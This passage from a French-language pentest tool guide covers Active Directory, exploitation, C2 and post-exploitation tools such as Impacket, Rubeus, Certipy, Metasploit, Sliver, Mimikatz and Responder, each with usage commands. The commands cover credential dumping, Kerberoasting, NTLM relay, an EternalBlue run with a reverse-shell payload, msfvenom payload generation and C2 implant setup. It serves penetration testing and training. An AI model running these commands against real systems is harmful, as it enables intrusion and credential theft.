Impacket est une collection de classes Python qui fournit un accès bas niveau aux protocoles réseau Windows : SMB, MSRPC, NTLM, Kerberos, LDAP et bien d'autres. Maintenu par Fortra (anciennement SecureAuth), Impacket offre des dizaines de scripts prêts à l'emploi pour le pentest AD : secretsdump pour l'extraction de credentials, psexec/wmiexec pour l'exécution distante, ntlmrelayx pour le relay d'authentification et de nombreux autres outils d'exploitation de protocoles Windows. C'est la bibliothèque fondamentale sur laquelle reposent de nombreux outils AD modernes.

• secretsdump — Extraction de hashes NTLM depuis SAM, LSA, NTDS.dit (local et distant)
• psexec/wmiexec/smbexec — Exécution de commandes distantes via différents protocoles
• Kerberos attacks — Kerberoasting, AS-REP roasting, golden/silver ticket, S4U
• smbclient — Client SMB complet pour l'accès aux partages réseau

# Installation
pip install impacket

# Extraction de credentials depuis un DC
impacket-secretsdump domain/user:password@dc.target.com

# Exécution distante via PsExec
impacket-psexec domain/admin:password@target.com

# Kerberoasting
impacket-GetUserSPNs domain/user:password -dc-ip 10.10.10.1 -request

# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip 10.10.10.1

Lien officiel : github.com/fortra/impacket

Notre verdict : Impacket est la bibliothèque fondamentale du pentest Active Directory. Ses scripts couvrent pratiquement toutes les attaques AD possibles, de l'extraction de credentials aux attaques Kerberos en passant par le relay NTLM. Maîtriser Impacket est un prérequis pour tout pentesteur spécialisé en AD. Indispensable et irremplaçable.

20. Rubeus — Attaques Kerberos en C#

Rubeus est un outil C# développé par le GhostPack pour les attaques et manipulations du protocole Kerberos. Conçu pour être exécuté directement en mémoire sur les systèmes Windows compromis, Rubeus permet le kerberoasting, l'AS-REP roasting, l'abus de délégation, la manipulation de tickets et l'exploitation de vulnérabilités Kerberos. C'est l'outil de choix pour les pentesteurs opérant depuis un système Windows compromis dans un environnement AD, offrant des capacités que les outils Python ne peuvent pas toujours reproduire fidèlement.

• Kerberoasting — Extraction de tickets de service pour le cracking offline de mots de passe
• AS-REP Roasting — Exploitation des comptes sans pré-authentification Kerberos
• Delegation abuse — Exploitation de la délégation contrainte et non contrainte
• Ticket manipulation — Demande, renouvellement, forge et injection de tickets Kerberos

# Installation : compilation depuis le code source avec Visual Studio
# Ou téléchargement du binaire pré-compilé

# Kerberoasting - extraction de tous les tickets de service
Rubeus.exe kerberoast /outfile:hashes.txt

# AS-REP Roasting
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# Demande de TGT avec hash NTLM (pass-the-hash)
Rubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt

# Abus de délégation contrainte (S4U)
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target

Lien officiel : github.com/GhostPack/Rubeus

Notre verdict : Rubeus est l'outil de référence pour les attaques Kerberos depuis un système Windows compromis. Sa capacité à s'exécuter en mémoire et sa couverture complète des techniques d'attaque Kerberos en font un outil essentiel du pentesteur AD. Utilisez Impacket pour les attaques Kerberos depuis Linux et Rubeus depuis Windows.

21. Certipy — Attaques AD CS (certificats)

Certipy est un outil Python spécialisé dans l'énumération et l'exploitation des vulnérabilités d'Active Directory Certificate Services (AD CS). Depuis la publication de la recherche « Certified Pre-Owned » par SpecterOps, les attaques AD CS sont devenues un vecteur d'escalade de privilèges majeur. Certipy automatise la découverte et l'exploitation des vulnérabilités ESC1 à ESC13, permettant dans de nombreux cas d'obtenir les droits Domain Admin en quelques minutes. L'outil est capable d'identifier des templates de certificats mal configurés, d'exploiter les faiblesses de la chaîne de certification et de réaliser des attaques de relay NTLM vers les services AD CS.

• Énumération AD CS — Découverte complète de l'infrastructure de certificats (CA, templates, permissions)
• Exploitation ESC1-ESC13 — Automatisation des 13 scénarios d'escalade de privilèges documentés
• Relay NTLM vers AD CS — Exploitation de PetitPotam et autres coerced authentication vers AD CS
• Forge de certificats — Création de certificats permettant l'authentification en tant que n'importe quel utilisateur

# Installation
pip install certipy-ad

# Énumération de l'infrastructure AD CS
certipy find -u user@domain -p password -dc-ip 10.10.10.1

# Exploitation ESC1 - template mal configuré
certipy req -u user@domain -p password -dc-ip 10.10.10.1 -ca CA-NAME -template VulnTemplate -upn administrator@domain

# Authentification avec un certificat
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

# Shadow Credentials attack
certipy shadow auto -u user@domain -p password -account target_user

Lien officiel : github.com/ly4k/Certipy

Notre verdict : Certipy est devenu un outil incontournable du pentest AD en 2026. Les vulnérabilités AD CS sont présentes dans la majorité des environnements et permettent souvent une escalade de privilèges rapide vers Domain Admin. Si vous faites du pentest AD, Certipy doit être dans votre boîte à outils. Son intégration avec BloodHound permet de visualiser les chemins d'attaque incluant les vecteurs de certificats.

22. SharpHound — Collecteur de données pour BloodHound

SharpHound est le collecteur de données officiel pour BloodHound, écrit en C#. Il interroge l'Active Directory via LDAP, SAMR et les sessions réseau pour collecter les informations nécessaires à l'analyse de chemins d'attaque : utilisateurs, groupes, machines, sessions, ACL, GPO, trusts et certificats. Les données collectées sont exportées au format JSON compressé (ZIP) pour importation dans BloodHound CE. SharpHound est conçu pour être exécuté depuis un système Windows membre du domaine cible, avec des options de collecte configurables pour minimiser l'impact et la détectabilité.

• Collecte All/DCOnly/Session — Modes de collecte configurables selon les besoins et les contraintes OPSEC
• Output JSON/ZIP — Export structuré compatible BloodHound CE pour importation directe
• Compatible BloodHound CE — Intégration native avec la dernière version de BloodHound
• Collecte incrémentale — Support des collectes incrémentielles pour les grands environnements

# Téléchargement du binaire depuis les releases GitHub

# Collecte complète
SharpHound.exe -c All --zipfilename output.zip

# Collecte DCOnly (moins bruyante)
SharpHound.exe -c DCOnly --zipfilename dconly.zip

# Collecte de sessions uniquement
SharpHound.exe -c Session --zipfilename sessions.zip

# Collecte avec domaine spécifique
SharpHound.exe -c All -d domain.local --zipfilename domain_data.zip

Lien officiel : github.com/BloodHoundAD/SharpHound

Notre verdict : SharpHound est le collecteur le plus fiable et le plus complet pour BloodHound. Son exécution depuis un système Windows membre du domaine garantit la qualité et l'exhaustivité des données collectées. Utilisez le mode DCOnly pour une collecte plus discrète, ou All pour une couverture maximale lors des audits sans contraintes d'OPSEC.

23. BloodyAD — Exploitation LDAP Active Directory

BloodyAD est un outil Python d'exploitation LDAP pour Active Directory, développé par CravateRouge. Il permet la modification directe d'objets AD via LDAP pour réaliser des attaques d'escalade de privilèges : manipulation d'ACL, ajout de Resource-Based Constrained Delegation (RBCD), création de Shadow Credentials, modification de propriétés d'objets et exploitation de permissions mal configurées. BloodyAD complète parfaitement BloodHound : là où BloodHound identifie les chemins d'attaque, BloodyAD permet de les exploiter concrètement via des modifications LDAP directes.

• Manipulation ACL — Modification des permissions sur les objets AD (WriteDacl, GenericAll, etc.)
• RBCD — Configuration de la Resource-Based Constrained Delegation pour l'escalade de privilèges
• Shadow Credentials — Ajout de clés dans msDS-KeyCredentialLink pour l'authentification alternative
• Modification d'objets AD — Changement de propriétés, ajout de membres aux groupes, réinitialisation de mots de passe

# Installation
pip install bloodyAD

# Désactiver la pré-authentification Kerberos (pour AS-REP Roasting)
bloodyAD -d domain.local -u user -p pass --host dc01 add uac user01 DONT_REQ_PREAUTH

# Ajouter un utilisateur au groupe Domain Admins
bloodyAD -d domain.local -u user -p pass --host dc01 add groupMember "Domain Admins" targetuser

# Configurer RBCD
bloodyAD -d domain.local -u user -p pass --host dc01 add rbcd target_computer attacker_computer

# Shadow Credentials
bloodyAD -d domain.local -u user -p pass --host dc01 add shadowCredentials target_user

Lien officiel : github.com/CravateRouge/bloodyAD

Notre verdict : BloodyAD est le complément parfait de BloodHound pour l'exploitation des chemins d'attaque AD. Sa capacité à modifier les objets AD via LDAP de manière simple et scriptable en fait un outil extrêmement efficace. Recommandé pour tous les pentesteurs AD qui cherchent une alternative aux PowerShell pour les modifications d'objets.

24. ADCSKiller — Exploitation automatisée AD CS

ADCSKiller est un outil d'exploitation automatisée des vulnérabilités d'Active Directory Certificate Services. Il scanne les configurations AD CS, identifie les templates vulnérables et automatise l'exploitation des scénarios ESC1 à ESC8. Plus automatisé que Certipy pour les cas d'usage courants, ADCSKiller est particulièrement utile pour les audits rapides où l'on souhaite identifier et exploiter les vulnérabilités AD CS sans configuration manuelle. L'outil intègre également des fonctionnalités de relay NTLM vers les services de certificats.

• Scan ESC1-ESC8 — Détection automatique des vulnérabilités de templates de certificats
• Exploitation automatique — Exploitation en un clic des vulnérabilités identifiées
• Relay NTLM — Intégration du relay NTLM vers les services AD CS pour l'exploitation de PetitPotam
• Reporting — Rapport détaillé des vulnérabilités identifiées et des recommandations

# Installation
pip install adcskiller

# Scan des vulnérabilités AD CS
adcskiller -u user -p password -d domain.local -dc-ip 10.10.10.1

# Exploitation automatique d'ESC1
adcskiller -u user -p password -d domain.local -dc-ip 10.10.10.1 --exploit ESC1

# Mode verbose pour le débogage
adcskiller -u user -p password -d domain.local -dc-ip 10.10.10.1 -v

Lien officiel : github.com/grimlockx/ADCSKiller

Notre verdict : ADCSKiller est un complément utile à Certipy pour les audits rapides de sécurité AD CS. Son automatisation poussée permet de gagner du temps sur les exploitations standard. Pour une analyse plus approfondie et un contrôle plus fin, préférez Certipy. Les deux outils sont complémentaires et couvrent bien l'ensemble des vulnérabilités AD CS.

Tableau comparatif — Active Directory

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
BloodHound CE	Open source (Apache 2.0)	Go/React	Intermédiaire	Visualisation chemins d'attaque	⭐⭐⭐⭐⭐
NetExec	Open source (BSD)	Python	Intermédiaire	Post-exploitation réseau	⭐⭐⭐⭐⭐
Impacket	Open source (Apache 2.0)	Python	Avancé	Protocoles réseau Windows	⭐⭐⭐⭐⭐
Rubeus	Open source (BSD)	C#	Avancé	Attaques Kerberos	⭐⭐⭐⭐⭐
Certipy	Open source (MIT)	Python	Intermédiaire	Attaques AD CS	⭐⭐⭐⭐⭐
SharpHound	Open source (GPLv3)	C#	Débutant	Collecte données AD	⭐⭐⭐⭐⭐
BloodyAD	Open source (MIT)	Python	Intermédiaire	Exploitation LDAP AD	⭐⭐⭐⭐
ADCSKiller	Open source	Python	Intermédiaire	Exploitation AD CS automatisée	⭐⭐⭐⭐

Phase 4 : Exploitation — 6 outils essentiels

La phase d'exploitation est le moment où le pentesteur utilise les vulnérabilités identifiées pour obtenir un accès initial à la cible ou pour escalader ses privilèges. Les outils de cette catégorie incluent les frameworks d'exploitation classiques comme Metasploit et les frameworks de Command & Control (C2) utilisés pour la simulation d'adversaires avancés. En 2026, le paysage des frameworks C2 s'est considérablement enrichi avec des solutions open source comme Sliver, Havoc et Mythic qui rivalisent avec les solutions commerciales. Pour un comparatif détaillé des frameworks C2, consultez notre guide des frameworks C2 2026.

25. Metasploit Framework — Framework d'exploitation de référence

Metasploit Framework est le framework d'exploitation le plus utilisé au monde, développé par Rapid7. Avec plus de 2000 exploits, des centaines de payloads (dont le célèbre Meterpreter) et des modules de post-exploitation complets, Metasploit couvre l'ensemble du cycle d'exploitation. Son architecture modulaire, sa console interactive (msfconsole) et son API permettent une automatisation poussée. En 2026, Metasploit continue d'être l'outil de référence pour les tests d'intrusion classiques, bien que les frameworks C2 modernes le supplantent pour les engagements Red Team avancés nécessitant plus de furtivité.

• 2000+ exploits — Bibliothèque massive couvrant Windows, Linux, macOS, mobile, IoT et applications web
• Payloads Meterpreter — Shell avancé avec keylogging, capture d'écran, pivoting et persistence
• Post-exploitation — Modules d'extraction de credentials, d'escalade de privilèges et de mouvement latéral
• Pivoting — Support du routing et du port forwarding pour atteindre les réseaux internes

# Installation
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# Exploitation EternalBlue (MS17-010)
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.10.10.1; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.10.2; run"

# Scan de vulnérabilités avec Metasploit
msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS 10.10.10.0/24; run"

# Génération de payload avec msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.2 LPORT=4444 -f exe -o payload.exe

Lien officiel : github.com/rapid7/metasploit-framework

Notre verdict : Metasploit reste le framework d'exploitation de référence en 2026, avec la bibliothèque d'exploits la plus complète disponible. Son Meterpreter est toujours l'un des shells de post-exploitation les plus puissants. Cependant, sa détection par les EDR modernes est excellente, ce qui le rend moins adapté aux engagements Red Team furtifs. Indispensable pour l'apprentissage et les pentests classiques.

26. Cobalt Strike — Plateforme de simulation d'adversaires

Cobalt Strike est la plateforme commerciale de simulation d'adversaires la plus utilisée par les équipes Red Team professionnelles. Son système de Beacon C2, ses profils Malleable C2 pour la personnalisation du trafic réseau et ses fonctionnalités avancées d'OPSEC en font un outil de choix pour les engagements de longue durée contre des défenseurs expérimentés. Bien que son prix soit élevé et qu'il soit parfois détourné par des acteurs malveillants, Cobalt Strike reste le standard de l'industrie pour la simulation d'attaques avancées en 2026.

• Beacon C2 — Implant léger avec communication asynchrone, modes HTTP/HTTPS/DNS/SMB
• Malleable C2 profiles — Personnalisation complète du trafic C2 pour l'évasion de détection
• Pivoting — Tunneling SOCKS, port forwarding et VPN pour atteindre les réseaux internes
• OPSEC features — Sleep obfuscation, process injection, in-memory execution pour la furtivité

# Licence commerciale requise (~3,500 USD/an par opérateur)
# Téléchargement depuis cobaltstrike.com après achat de licence

# Démarrage du teamserver
./teamserver 10.10.10.2 my_password malleable_profile.profile

# Connexion du client
./cobaltstrike

# Workflow typique :
# 1. Configurer un listener HTTPS
# 2. Générer un payload (Beacon stageless)
# 3. Déployer sur la cible
# 4. Mouvement latéral avec pass-the-hash
# 5. Exfiltration de données

Lien officiel : cobaltstrike.com

Notre verdict : Cobalt Strike reste le gold standard des frameworks C2 commerciaux en 2026. Ses Malleable C2 profiles et ses fonctionnalités d'OPSEC sont inégalées. Cependant, son prix élevé et la disponibilité d'alternatives open source de qualité (Sliver, Mythic) rendent l'investissement discutable pour les petites structures. Réservé aux équipes Red Team professionnelles avec budget.

27. Sliver — Framework C2 open source

Sliver est un framework C2 open source développé par BishopFox, devenu en quelques années l'alternative open source la plus sérieuse à Cobalt Strike. Sliver supporte des implants multi-OS (Windows, Linux, macOS), de multiples canaux de communication (mTLS, WireGuard, DNS, HTTP/S) et un système d'extensions (armory) pour étendre ses capacités. Son interface en ligne de commande est intuitive et sa documentation excellent. En 2026, Sliver est le choix numéro 1 des équipes Red Team qui cherchent une solution C2 gratuite et puissante.

• Implants multi-OS — Windows, Linux, macOS avec support ARM et AMD64
• mTLS/WireGuard/DNS/HTTP(S) — Multiples canaux de communication pour la résilience et la furtivité
• Armory d'extensions — Marketplace de BOF, extensions et plugins communautaires
• Multi-joueur — Support de multiples opérateurs simultanés avec gestion des permissions

# Installation
curl https://sliver.sh/install | sudo bash

# Lancer le serveur Sliver
sliver-server

# Générer un implant mTLS
sliver > generate --mtls 10.10.10.1 --os windows --arch amd64 --save implant.exe

# Configurer un listener
sliver > mtls --lhost 10.10.10.1 --lport 8888

# Interagir avec un implant actif
sliver > use [SESSION_ID]
sliver (IMPLANT) > whoami
sliver (IMPLANT) > execute-assembly /path/to/SharpHound.exe -c All

Lien officiel : github.com/BishopFox/sliver

Notre verdict : Sliver est le meilleur framework C2 open source en 2026. Son rapport qualité/prix (gratuit !) est imbattable, et ses fonctionnalités rivalisent avec celles de Cobalt Strike pour la majorité des cas d'usage. Son armory permet d'étendre ses capacités à l'infini. Recommandé comme premier choix C2 pour les équipes Red Team et les pentesteurs indépendants. Consultez notre GitHub Ayinedjimi pour des exemples de configurations Sliver.

28. Havoc — Framework C2 moderne et modulaire

Havoc est un framework C2 moderne développé avec une interface graphique Qt élégante et un système d'agents modulaire. Son agent Demon est conçu pour l'évasion des EDR modernes avec des techniques avancées de sleep obfuscation, d'injection de processus et d'exécution en mémoire. Havoc se distingue par son interface utilisateur intuitive qui rappelle celle de Cobalt Strike, et par son support natif des BOF (Beacon Object Files) qui permet de réutiliser l'écosystème d'extensions de Cobalt Strike.

• Interface Qt moderne — GUI élégante et intuitive pour la gestion des agents et des sessions
• Agents Demon — Implants avec sleep obfuscation et techniques d'évasion EDR avancées
• BOF support — Compatibilité avec les Beacon Object Files de l'écosystème Cobalt Strike
• Sleep obfuscation — Techniques de chiffrement en mémoire pendant les périodes de sommeil de l'agent

# Installation depuis le code source
git clone https://github.com/HavocFramework/Havoc
cd Havoc

# Build du teamserver
make ts-build

# Build du client
make client-build

# Lancer le teamserver
./havoc server --profile profiles/havoc.yaotl

# Lancer le client GUI
./havoc client

Lien officiel : github.com/HavocFramework/Havoc

Notre verdict : Havoc est une excellente alternative C2 pour les opérateurs qui préfèrent une interface graphique. Son agent Demon et ses techniques d'évasion EDR sont impressionnants. Le support des BOF est un atout majeur qui permet de bénéficier de l'écosystème Cobalt Strike. Encore en développement actif, Havoc gagne en maturité à chaque release.

29. Mythic — Plateforme C2 multi-agent avec interface web

Mythic est une plateforme C2 multi-agent avec une interface web collaborative. Sa force réside dans son architecture modulaire qui supporte de multiples types d'agents (Apollo pour Windows, Poseidon pour Linux/macOS, Medusa pour Python cross-platform, etc.) et dans son système de logging complet qui facilite la documentation des opérations Red Team. L'interface web de Mythic est la plus riche de tous les frameworks C2, avec des fonctionnalités de gestion de fichiers, de visualisation de processus et de collaboration entre opérateurs.

• Multi-agent — Support de multiples types d'agents spécialisés (Apollo, Poseidon, Medusa, etc.)
• Interface web collaborative — Dashboard riche avec gestion de fichiers, visualisation et collaboration
• Logging complet — Traçabilité complète de toutes les actions pour la documentation d'opérations
• Architecture Docker — Déploiement facile via conteneurs avec isolation des composants

# Installation du framework
git clone https://github.com/its-a-feature/Mythic
cd Mythic
./mythic-cli install github https://github.com/MythicAgents/Apollo

# Démarrer Mythic
./mythic-cli start

# Installer un agent supplémentaire
./mythic-cli install github https://github.com/MythicAgents/Poseidon

# Accéder à l'interface web
# https://localhost:7443
# Credentials par défaut : mythic_admin / mot de passe généré

Lien officiel : github.com/its-a-feature/Mythic

Notre verdict : Mythic est le framework C2 le plus flexible grâce à son architecture multi-agent. Son interface web est la plus complète de l'écosystème C2 open source. Idéal pour les équipes Red Team qui ont besoin de supporter plusieurs systèmes d'exploitation simultanément et qui valorisent la traçabilité des opérations. La courbe d'apprentissage est plus raide que celle de Sliver.

30. Covenant — Framework C2 .NET collaboratif

Covenant est un framework C2 .NET avec une interface web collaborative. Ses agents Grunt, écrits en C#, sont particulièrement adaptés aux environnements Windows où le .NET Framework est omniprésent. Covenant se distingue par son système de tâches modulaires et sa capacité à charger et exécuter des assemblies .NET en mémoire. Bien que moins activement maintenu que Sliver ou Mythic, Covenant reste un choix pertinent pour les opérations ciblant spécifiquement les environnements Windows .NET.

• Interface web — Dashboard web pour la gestion des listeners, launchers et sessions
• Grunts .NET — Agents C# compilés à la volée avec personnalisation du profil de communication
• Tasks modulaires — Bibliothèque de tâches post-exploitation (mimikatz, port scan, assembly loading)
• Collaboration multi-opérateur — Support de plusieurs opérateurs avec rôles et permissions

# Installation depuis le code source
git clone https://github.com/cobbr/Covenant
cd Covenant/Covenant
dotnet run

# Accéder à l'interface web
# https://localhost:7443

# Workflow typique :
# 1. Créer un Listener HTTP/HTTPS
# 2. Générer un Launcher (PowerShell, binary, etc.)
# 3. Déployer le Grunt sur la cible
# 4. Exécuter des Tasks depuis l'interface web

Lien officiel : github.com/cobbr/Covenant

Notre verdict : Covenant est un framework C2 solide pour les environnements Windows .NET. Son interface web et ses Grunts modulaires sont bien conçus. Cependant, le développement a ralenti ces dernières années, et nous recommandons Sliver ou Mythic pour les nouveaux projets. Covenant reste utile pour les pentesteurs habitués à l'écosystème .NET et aux outils GhostPack.

Tableau comparatif — Exploitation & C2

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Metasploit	Open source (BSD)	Ruby	Intermédiaire	Exploitation et post-exploitation	⭐⭐⭐⭐⭐
Cobalt Strike	Commerciale	Java	Avancé	Simulation d'adversaires Red Team	⭐⭐⭐⭐⭐
Sliver	Open source (GPLv3)	Go	Intermédiaire	C2 open source polyvalent	⭐⭐⭐⭐⭐
Havoc	Open source	C/C++/Go	Avancé	C2 avec évasion EDR avancée	⭐⭐⭐⭐
Mythic	Open source (BSD)	Go/Python	Avancé	C2 multi-agent collaboratif	⭐⭐⭐⭐
Covenant	Open source (GPLv3)	C#/.NET	Intermédiaire	C2 .NET pour Windows	⭐⭐⭐

Phase 5 : Post-Exploitation — 6 outils essentiels

La post-exploitation est la phase qui suit l'obtention d'un accès initial à un système. Elle comprend l'extraction de credentials, l'escalade de privilèges, le mouvement latéral, la persistance et le pivoting vers d'autres segments réseau. Les outils de cette section permettent de maximiser l'impact d'un accès initial pour démontrer le risque réel lors d'un audit. La post-exploitation est souvent la phase la plus critique car c'est elle qui détermine la profondeur de la compromission et donc la valeur du rapport final pour le client.

31. Mimikatz — Extraction de credentials Windows

Mimikatz est l'outil de référence pour l'extraction de credentials sur les systèmes Windows, développé par Benjamin Delpy (gentilkiwi). Mimikatz peut extraire des mots de passe en clair, des hashes NTLM, des tickets Kerberos et des certificats directement depuis la mémoire du processus LSASS. Ses capacités incluent également la création de Golden et Silver Tickets, l'attaque DCSync pour l'extraction de tous les hashes du domaine et la manipulation de certificats. Malgré une détection quasi universelle par les EDR modernes, Mimikatz reste l'outil post-exploitation le plus important pour comprendre les mécanismes d'authentification Windows et pour les audits en environnements non protégés.

• Extraction de mots de passe — Récupération des credentials en clair depuis la mémoire LSASS
• Tickets Kerberos — Extraction, forge et injection de TGT et TGS
• Golden/Silver Ticket — Création de tickets Kerberos forgés pour la persistance
• DCSync — Réplication des credentials depuis un contrôleur de domaine sans accès physique

# Téléchargement depuis les releases GitHub ou compilation

# Extraction de mots de passe en mémoire
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# DCSync - extraction du hash du compte krbtgt
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt" exit

# Golden Ticket
mimikatz.exe "kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt" exit

# Export de tous les tickets Kerberos
mimikatz.exe "sekurlsa::tickets /export" exit

Lien officiel : github.com/gentilkiwi/mimikatz

Notre verdict : Mimikatz reste l'outil fondamental de la post-exploitation Windows. Bien que sa signature soit connue de tous les EDR, ses techniques sont implémentées dans de nombreux autres outils (Beacon, Meterpreter, SharpKatz). Comprendre Mimikatz est essentiel pour tout pentesteur AD. En environnement protégé par un EDR, préférez les alternatives en mémoire comme SafetyKatz ou les BOF dédiés.

32. LaZagne — Récupération de mots de passe multi-applications

LaZagne est un outil de récupération de mots de passe stockés dans de multiples applications : navigateurs web (Chrome, Firefox, Edge), clients email, bases de données, outils d'administration système, clients Wi-Fi et bien d'autres. Disponible pour Windows et Linux, LaZagne exploite les mécanismes de stockage de credentials propres à chaque application (DPAPI, Keychain, etc.) pour extraire les mots de passe en clair. C'est un outil de post-exploitation rapide et efficace pour démontrer le risque de stockage non sécurisé de mots de passe.

• Navigateurs — Chrome, Firefox, Edge, Opera, Internet Explorer : extraction de mots de passe sauvegardés
• Messagerie — Outlook, Thunderbird, pidgin : récupération des credentials de connexion
• Bases de données — MySQL Workbench, PostgreSQL, SQLDeveloper : extraction des connexions enregistrées
• Sysadmin — PuTTY, WinSCP, FileZilla, mRemoteNG : récupération des sessions sauvegardées
• Wi-Fi — Extraction des clés des réseaux Wi-Fi enregistrés sur le système

# Installation
pip install lazagne

# Ou téléchargement du binaire pré-compilé

# Extraction de tous les mots de passe
lazagne.exe all

# Extraction ciblée par catégorie
lazagne.exe browsers
lazagne.exe wifi
lazagne.exe sysadmin

# Export en JSON
lazagne.exe all -oJ

Lien officiel : github.com/AlessandroZ/LaZagne

Notre verdict : LaZagne est un outil simple mais extrêmement efficace pour la récupération de mots de passe stockés. Il démontre clairement aux clients le risque de stockage de credentials dans les applications. Rapide à exécuter et facile à interpréter, c'est un must-have de la phase de post-exploitation.

33. Responder — Empoisonnement LLMNR/NBT-NS

Responder est un outil d'empoisonnement de protocoles de résolution de noms (LLMNR, NBT-NS, mDNS) et de capture de hashes d'authentification sur les réseaux Windows. En répondant aux requêtes de résolution de noms broadcast, Responder capture les hashes NTLMv1/v2 des utilisateurs qui tentent d'accéder à des ressources réseau inexistantes. Ces hashes peuvent ensuite être crackés offline ou relayés vers d'autres services via ntlmrelayx. Responder inclut également des serveurs HTTP, SMB, FTP et LDAP rogue pour la capture de credentials en clair dans certains scénarios.

• Capture NTLMv1/v2 — Interception des hashes d'authentification NTLM sur le réseau local
• Serveurs rogue — HTTP, SMB, FTP, LDAP, SQL pour la capture de credentials variées
• Analyse passive — Mode analyse pour observer le trafic sans interférer
• IPv6 support — Empoisonnement DHCPv6 et DNS IPv6 pour les réseaux modernes

# Installation
git clone https://github.com/lgandx/Responder && cd Responder

# Lancer Responder en mode complet
python3 Responder.py -I eth0 -dwP

# Mode analyse (passif)
python3 Responder.py -I eth0 -A

# Les hashes capturés sont dans Responder/logs/
cat logs/NTLMv2-*.txt

# Cracker les hashes avec Hashcat
hashcat -m 5600 captured_hashes.txt wordlist.txt

Lien officiel : github.com/lgandx/Responder

Notre verdict : Responder est un outil de pentest réseau essentiel pour les environnements Windows. L'empoisonnement LLMNR/NBT-NS fonctionne encore dans la majorité des réseaux d'entreprise en 2026 et permet souvent de capturer des hashes de comptes à privilèges élevés. Combinez Responder avec ntlmrelayx pour des attaques de relay plus avancées.

34. ntlmrelayx — Relay d'authentification NTLM

ntlmrelayx (partie d'Impacket) est l'outil de référence pour les attaques de relay NTLM. Au lieu de cracker les hashes capturés, ntlmrelayx les relaie directement vers d'autres services pour obtenir un accès authentifié. Les cibles de relay incluent SMB, HTTP, LDAP, MSSQL et AD CS. Combiné avec Responder ou des techniques de coerced authentication (PetitPotam, PrinterBug), ntlmrelayx permet souvent d'escalader les privilèges jusqu'à Domain Admin en relayant l'authentification d'un contrôleur de domaine vers les services AD CS.

• Relay SMB/HTTP/LDAP — Relay de l'authentification NTLM vers de multiples protocoles
• Délégation RBCD — Configuration automatique de Resource-Based Constrained Delegation via LDAP relay
• AD CS relay — Relay vers les services de certificats pour l'obtention de certificats d'authentification
• SOCKS proxy — Mode SOCKS pour réutiliser les sessions relayées avec d'autres outils

# Installation (inclus dans Impacket)
pip install impacket

# Relay SMB basique
impacket-ntlmrelayx -tf targets.txt -smb2support

# Relay vers LDAP pour RBCD
impacket-ntlmrelayx -t ldap://dc.domain.local --delegate-access

# Relay vers AD CS (ESC8)
impacket-ntlmrelayx -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController

# Mode SOCKS pour réutilisation de sessions
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

Lien officiel : github.com/fortra/impacket

Notre verdict : ntlmrelayx est un outil d'exploitation extrêmement puissant, particulièrement en combinaison avec PetitPotam et AD CS. Le relay NTLM vers LDAP ou AD CS est souvent le chemin le plus rapide vers Domain Admin dans les environnements non patchés. Maîtriser ntlmrelayx est essentiel pour tout pentesteur AD avancé.

35. Evil-WinRM — Shell WinRM pour le pentesting

Evil-WinRM est un shell WinRM (Windows Remote Management) conçu spécialement pour le pentesting. Il offre un shell PowerShell interactif sur les systèmes Windows distants avec des fonctionnalités de post-exploitation intégrées : upload/download de fichiers, chargement de scripts PowerShell, chargement de DLLs en mémoire et support de l'authentification par hash NTLM (pass-the-hash). Evil-WinRM est devenu l'outil de prédilection pour l'accès distant aux systèmes Windows lors des tests d'intrusion, remplaçant avantageusement PsExec dans de nombreux scénarios.

• Shell PowerShell interactif — Accès complet à PowerShell sur le système distant
• Upload/download — Transfert de fichiers simple et rapide
• Chargement scripts/DLL — Chargement en mémoire de scripts PowerShell et de DLLs .NET
• Pass-the-Hash — Authentification avec un hash NTLM sans connaître le mot de passe

# Installation
gem install evil-winrm

# Connexion avec mot de passe
evil-winrm -i 10.10.10.1 -u admin -p password

# Connexion avec hash NTLM (pass-the-hash)
evil-winrm -i 10.10.10.1 -u admin -H NTLM_HASH

# Upload de fichier
*Evil-WinRM* PS> upload /local/path/file.exe C:\\Users\\admin\\file.exe

# Chargement de script PowerShell en mémoire
evil-winrm -i 10.10.10.1 -u admin -p password -s /scripts/
*Evil-WinRM* PS> Invoke-Mimikatz.ps1

Lien officiel : github.com/Hackplayers/evil-winrm

Notre verdict : Evil-WinRM est l'outil idéal pour l'accès distant WinRM lors des pentests. Sa simplicité d'utilisation, ses fonctionnalités de post-exploitation intégrées et son support du pass-the-hash en font un choix évident. Nous l'utilisons systématiquement comme alternative à PsExec lorsque WinRM est disponible sur la cible.

36. Chisel — Tunnel TCP/UDP via HTTP pour le pivoting

Chisel est un outil de tunneling TCP/UDP via HTTP, conçu pour le pivoting lors des tests d'intrusion. Écrit en Go, il produit un binaire unique qui fonctionne comme client et serveur, facilitant le déploiement sur les systèmes compromis. Chisel supporte le port forwarding local et distant, le SOCKS5 proxy et le chiffrement du trafic. C'est l'outil de pivoting le plus populaire en 2026, remplaçant avantageusement les tunnels SSH dans les environnements où SSH n'est pas disponible ou est bloqué par le pare-feu.

• Tunnel HTTP — Encapsulation TCP/UDP dans du trafic HTTP pour le contournement de pare-feu
• SOCKS5 proxy — Proxy SOCKS5 pour router le trafic de multiples outils via le tunnel
• Reverse port forward — Redirection de ports depuis la cible vers l'attaquant
• Chiffrement — Chiffrement TLS du trafic tunnelé pour la confidentialité

# Installation
go install github.com/jpillora/chisel@latest

# Sur la machine attaquante : démarrer le serveur
chisel server --reverse --port 8080

# Sur la cible : connexion reverse SOCKS
